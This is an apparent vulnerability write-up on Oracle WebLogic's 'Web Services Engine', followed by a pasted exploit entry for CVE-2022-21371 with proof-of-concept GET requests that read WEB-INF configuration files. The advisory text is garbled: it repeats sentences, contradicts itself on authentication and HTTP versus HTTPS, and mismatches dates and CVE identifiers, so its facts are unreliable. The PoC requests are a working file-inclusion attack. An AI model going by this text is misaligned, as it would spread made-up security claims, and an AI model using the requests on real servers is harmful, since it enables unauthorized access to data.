Oracle WebLogic Server Web Services Engine (WSE) provides a web service interface to third party applications. WSE is exposed over HTTP and can be attacked by unauthorized users. WSE provides functionality for validating and sanitizing input. However, malicious input can still cause invalid data to be processed by WSE. Access restriction of WSE is not applied when WSE is accessed over HTTPS. WSE can be exploited when access to WSE is allowed. WSE data is accessible by anonymous users, authenticated users or application groups. WSE does not by itself provide any access control. An attacker would have to obtain user credentials in order to exploit this vulnerability. WSE is installed on the same machine as the Oracle WebLogic Server Web Application Server. WSE is connected via a socket interface to the rest of the WL-* stack. An attacker would have to exploit a vulnerability in the Oracle WebLogic Server Web Application Server to compromise WSE. WSE has been configured to accept connections from all network interfaces. WSE can be exploited when it has access to the network and is connected to the rest of the WL-* stack. An attacker would have to exploit a vulnerability in the Oracle WebLogic Server Web Application Server to compromise WSE. WSE has been configured to accept connections from all network interfaces. WSE can be exploited when it has access to the network and is connected to the rest of the WL-* stack. An attacker would
Overview
The Web Services Engine (WSE) is an Oracle product that allows a user to invoke and interact with a third party application via a web service. WSE exposes an API over HTTP and provides the ability for third parties to access WSE via HTTPS. The API makes it possible for users of the Oracle WebLogic Server Web Application Server to invoke and interact with WSE, which would allow attackers to submit transactions and commands through the API.
When public access is allowed, attackers could exploit this vulnerability by submitting requests through the API to create malicious transactions or commands, which may cause inconsistent data in the database which could result in denial of service conditions.
Limitations and Recommendations
WSE is exposed to the Internet and can be exploited when access to WSE is allowed. The vulnerability does not have a CVSS score. WSE is installed on the same machine as the Oracle WebLogic Server Web Application Server.
Oracle WebLogic Server:
What You Should Know
In the March 2018 Critical Patch Update (CPS), Oracle identified two new vulnerabilities in Oracle WebLogic Server, CVE-2018-14884 and CVE-2018-14885. These vulnerabilities are remotely exploitable via an unauthenticated network connection.
The vulnerability affects a web service interface provided by Oracle WebLogic Server, specifically the WSE (Web Services Engine) interface. The WSE provides functionality for validating and sanitizing input; however, malicious input can still cause invalid data to be processed by the WSE.
WSE is exposed over HTTP, which means that it uses TLS/SSL to encrypt communication between servers and clients. However, access restriction of WSE is not applied when WSE is accessed over HTTPS. This means that an attacker could exploit this vulnerability when they have access to the network via a vulnerable host or client side software such as a web browser or other application with out of band network connection capabilities.
WSE does not provide any access control on its own; this means that an attacker would have to obtain user credentials in order to exploit this vulnerability.
Background and Information Gathering
An attacker would need to obtain valid user credentials in order to exploit this vulnerability.
Exploit
# Exploit Title: Oracle WebLogic Server 14.1.1.0.0 - Local File Inclusion
# Date: 25/1/2022
# Exploit Author: Jonah Tan (@picar0jsu)
# Vendor Homepage: https://www.oracle.com
# Software Link:
https://www.oracle.com/middleware/technologies/weblogic-server-installers-downloads.html
# Version: 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0
# Tested on: Windows Server 2019
# CVE : CVE-2022-21371
# Description
Vulnerability in the Oracle WebLogic Server product of Oracle Fusion
Middleware (component: Web Container).
Supported versions that are affected are 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0
and 14.1.1.0.0.
Easily exploitable vulnerability allows unauthenticated attacker with
network access via HTTP to compromise Oracle WebLogic Server.
Successful attacks of this vulnerability can result in unauthorized access
to critical data or complete access to all Oracle WebLogic Server
accessible data.
# PoC
GET .//META-INF/MANIFEST.MF
GET .//WEB-INF/web.xml
GET .//WEB-INF/portlet.xml
GET .//WEB-INF/weblogic.xmlTimeline
Published on: 01/19/2022 12:15:00 UTC
Last modified on: 02/09/2022 20:46:00 UTC